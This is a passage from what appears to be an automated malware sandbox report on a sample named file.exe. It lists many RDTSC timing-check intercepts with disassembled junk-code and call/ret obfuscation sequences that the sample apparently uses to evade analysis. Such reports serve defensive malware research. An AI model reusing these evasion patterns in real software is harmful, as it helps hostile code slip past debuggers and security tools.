eax, esi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 884D49 second address: 884D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885ABA second address: 885ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885ABF second address: 885AE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F43A4FCF6A1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43A4FCF69Dh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885AE8 second address: 885AED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88796C second address: 887A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F43A4FCF69Ch 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F43A4FCF6A2h 0x00000013 nop 0x00000014 xor edi, 17039F4Ah 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007F43A4FCF698h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 jc 00007F43A4FCF69Eh 0x0000003c jnl 00007F43A4FCF698h 0x00000042 add dword ptr [ebp+124510E4h], ecx 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F43A4FCF698h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 xchg eax, esi 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F43A4FCF69Fh 0x0000006c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888B2 second address: 8888B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B75 second address: 887B7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888B6 second address: 8888C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B7B second address: 887B91 instructions: 0x00000000 rdtsc 0x00000002 je 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e ja 00007F43A4FCF69Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8888C0 second address: 888913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F43A4BB4C28h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov bx, dx 0x00000027 push 00000000h 0x00000029 mov edi, dword ptr [ebp+122D35AFh] 0x0000002f push 00000000h 0x00000031 mov bx, dx 0x00000034 push eax 0x00000035 pushad 0x00000036 jno 00007F43A4BB4C33h 0x0000003c push eax 0x0000003d push edx 0x0000003e push edi 0x0000003f pop edi 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887B91 second address: 887C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 nop 0x00000006 mov dword ptr [ebp+122D25C3h], ecx 0x0000000c xor ebx, dword ptr [ebp+122D35A5h] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007F43A4FCF698h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 jmp 00007F43A4FCF6A0h 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, dword ptr [ebp+122D34A2h] 0x00000045 mov eax, dword ptr [ebp+122D1659h] 0x0000004b push eax 0x0000004c mov dword ptr [ebp+122D2CF6h], ebx 0x00000052 pop edi 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push edi 0x00000058 call 00007F43A4FCF698h 0x0000005d pop edi 0x0000005e mov dword ptr [esp+04h], edi 0x00000062 add dword ptr [esp+04h], 0000001Bh 0x0000006a inc edi 0x0000006b push edi 0x0000006c ret 0x0000006d pop edi 0x0000006e ret 0x0000006f mov ebx, ecx 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C24 second address: 887C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C28 second address: 887C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C2C second address: 887C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C32 second address: 887C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 887C38 second address: 887C3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889874 second address: 889878 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 889878 second address: 88987C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88987C second address: 889913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F43A4FCF6A5h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F43A4FCF698h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2ADBh] 0x0000002f mov ebx, dword ptr [ebp+122D2B0Fh] 0x00000035 push 00000000h 0x00000037 movzx edi, bx 0x0000003a push 00000000h 0x0000003c cld 0x0000003d xchg eax, esi 0x0000003e jmp 00007F43A4FCF69Ch 0x00000043 push eax 0x00000044 pushad 0x00000045 pushad 0x00000046 jmp 00007F43A4FCF6A1h 0x0000004b jl 00007F43A4FCF696h 0x00000051 popad 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F43A4FCF6A5h 0x00000059 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A5A second address: 888A70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 888A70 second address: 888A7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88AC81 second address: 88AC8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88AC8B second address: 88AC8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88AC8F second address: 88AC93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88CB0A second address: 88CB0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88EA43 second address: 88EA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88FB0F second address: 88FB15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890B5E second address: 890B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892A61 second address: 892A67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 892A67 second address: 892A6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 890D49 second address: 890D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D771 second address: 83D782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b je 00007F43A4BB4C26h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83D782 second address: 83D786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894F70 second address: 894F76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 894F76 second address: 894F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89419B second address: 8941C0 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43A4BB4C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007F43A4BB4C28h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89A726 second address: 89A72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8427AC second address: 8427B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8427B2 second address: 8427F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43A4FCF69Bh 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F43A4FCF6A1h 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BC6C second address: 89BC7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89BC7A second address: 89BC90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A2h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 840D0F second address: 840D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EEF6 second address: 89EEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89EEFC second address: 89EF00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A73CD second address: 8A73D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC056 second address: 8AC08A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Eh 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007F43A4BB4C39h 0x0000000f jne 00007F43A4BB4C26h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC1EA second address: 8AC221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F43A4FCF69Ah 0x00000011 jmp 00007F43A4FCF69Dh 0x00000016 jmp 00007F43A4FCF69Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC383 second address: 8AC38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC38B second address: 8AC393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC91F second address: 8AC947 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43A4BB4C37h 0x00000009 jmp 00007F43A4BB4C2Dh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC947 second address: 8AC94B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACBC9 second address: 8ACBCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ACBCD second address: 8ACC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43A4FCF6A4h 0x00000012 push ecx 0x00000013 jns 00007F43A4FCF696h 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B12F3 second address: 8B130B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 jng 00007F43A4BB4C26h 0x00000017 popad 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 881E0A second address: 881E5E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F43A4FCF698h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 pushad 0x00000029 mov dword ptr [ebp+122D2CF6h], esi 0x0000002f jmp 00007F43A4FCF6A1h 0x00000034 popad 0x00000035 lea eax, dword ptr [ebp+12486B9Dh] 0x0000003b mov ecx, dword ptr [ebp+122D25B3h] 0x00000041 push eax 0x00000042 pushad 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8823AB second address: 6CE8A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F43A4BB4C26h 0x00000012 popad 0x00000013 pop ebx 0x00000014 nop 0x00000015 mov dword ptr [ebp+122D3333h], edx 0x0000001b push dword ptr [ebp+122D083Dh] 0x00000021 mov edx, 67B44BE8h 0x00000026 call dword ptr [ebp+122D1BA8h] 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D347Eh], edx 0x00000033 xor eax, eax 0x00000035 jnp 00007F43A4BB4C27h 0x0000003b cmc 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 jp 00007F43A4BB4C34h 0x00000046 mov dword ptr [ebp+122D2B7Fh], eax 0x0000004c mov dword ptr [ebp+122D1B4Ch], ecx 0x00000052 mov esi, 0000003Ch 0x00000057 jg 00007F43A4BB4C2Eh 0x0000005d jc 00007F43A4BB4C28h 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 pushad 0x00000068 mov di, CB00h 0x0000006c mov esi, dword ptr [ebp+122D2ACBh] 0x00000072 popad 0x00000073 lodsw 0x00000075 clc 0x00000076 add eax, dword ptr [esp+24h] 0x0000007a ja 00007F43A4BB4C37h 0x00000080 mov ebx, dword ptr [esp+24h] 0x00000084 pushad 0x00000085 sbb al, 00000015h 0x00000088 popad 0x00000089 push eax 0x0000008a jc 00007F43A4BB4C34h 0x00000090 push eax 0x00000091 push edx 0x00000092 jng 00007F43A4BB4C26h 0x00000098 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 882462 second address: 88247C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88247C second address: 8824A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F43A4BB4C30h 0x00000008 jmp 00007F43A4BB4C2Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F43A4BB4C33h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8824A9 second address: 8824AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8824AD second address: 8824B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8824B3 second address: 8824DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8824DA second address: 88251D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jo 00007F43A4BB4C26h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F43A4BB4C28h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov di, 919Ch 0x0000002d push 56955ED2h 0x00000032 push eax 0x00000033 push edx 0x00000034 jp 00007F43A4BB4C2Ch 0x0000003a jc 00007F43A4BB4C26h 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 883118 second address: 883122 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8831BB second address: 88320D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007F43A4BB4C2Ah 0x00000010 jmp 00007F43A4BB4C37h 0x00000015 popad 0x00000016 nop 0x00000017 mov dh, 0Bh 0x00000019 lea eax, dword ptr [ebp+12486BE1h] 0x0000001f mov edi, dword ptr [ebp+122D2A3Fh] 0x00000025 mov ecx, edi 0x00000027 nop 0x00000028 jo 00007F43A4BB4C38h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88320D second address: 883221 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B08AE second address: 8B08C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F43A4BB4C2Eh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0BA3 second address: 8B0BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0BAB second address: 8B0BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43A4BB4C26h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0BB5 second address: 8B0BBB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0E74 second address: 8B0E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0E78 second address: 8B0E80 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0E80 second address: 8B0E9C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F43A4BB4C32h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B0E9C second address: 8B0EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B3E26 second address: 8B3E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F43A4BB4C26h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE100 second address: 8BE12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A4h 0x00000009 popad 0x0000000a jbe 00007F43A4FCF69Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jns 00007F43A4FCF696h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BE12A second address: 8BE132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD151 second address: 8BD155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD29F second address: 8BD2A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD2A3 second address: 8BD2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
